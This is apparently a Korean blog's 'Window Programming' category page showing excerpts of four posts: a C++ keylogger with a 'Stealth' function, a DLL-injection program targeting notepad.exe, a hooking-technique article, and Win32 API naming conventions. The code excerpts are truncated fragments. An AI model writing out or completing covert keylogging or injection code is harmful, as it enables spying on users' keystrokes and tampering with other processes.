Window Programming (4) 썸네일형 리스트형 Key Logger #include using namespace std;#include #include int Save (int key_stroke, char *file);void Stealth(); int main(){Stealth();char i; while (1){for(i = 8; i InjectDll // Reference: www.reversecore.com #include "stdio.h" #include "windows.h" #include "tlhelp32.h" #define DEF_PROC_NAME("notepad.exe") #define DEF_DLL_PATH("c:\\work\\myhack.dll") DWORD FindProcessID(LPCTSTR szProcessName); BOOL InjectDll(DWORD dwPID, LPCTSTR szDllName); int main(int argc, char* argv[]) { DWORD dwPID = 0xFFFFFFFF; // find process dwPID = FindProcessID(DEF_PROC_NAME); if( dwPID == .. 다시 보는 후킹 기법 10여 년 전 후킹 기법은 고급 테크닉에 속하는 생소한 개념이었고, 그만큼 단순한 후킹도 고급 기술로 취급받았다. 하지만 이제는 누구나 알고 있는 기술 중 하나가 됐다. 그럼에도 불구하고 이 기술을 잘 사용하기란 그리 쉽지 않다. 인터넷에 있는 여러 예제 코드 중 하나를 가져와 사용할 수는 있겠지만 이로 인해 발생하는 다양한 문제점을 이해하고 수정하는 데는 시스템에 대한 전반적인 지식이 필요하다. 결국 후킹 기술은 많이 알려졌지만 이를 잘 사용하는 방법들은 오히려 더 찾아보기 힘들어진 셈이다. 이 글에서는 후킹 기술에 대한 실질적인 이해와 활용을 위한 고급 비법들을 소개한다. 권용휘 rodream@gmail.com|http://rodream.net에서 악성코드 제거기 ‘울타리’와 컴퓨터 최적화 프로그램인.. WIN 32 API 시작하기전에 간단히 알아두기 헝가리식 변수 명명법 접두어 원래말 의미 cb Count of Byte 바이트 수 dw double Word unsigned long h handle 윈도우, 비트맵 , 파일등의 핸들 sz Null Teminated NULL 종료 문자열 ch Character 문자형 a Array 배열 w Word 부호 없는 정수형 (unsiged short) i integer 정수형 p, lp long pointer 포인터형 b Bool 논리형 윈도우즈 사용자 정의 데이터형 데이터형 의미 BYTE unsigned char CHAR char WORD unsigned short DWORD unsinged long LONG long와 동일 BOOL 정수형이며 TRUE , FALSE중 하나의 값을 지님 핸들 핸들이란 구체적인.. 이전 1 다음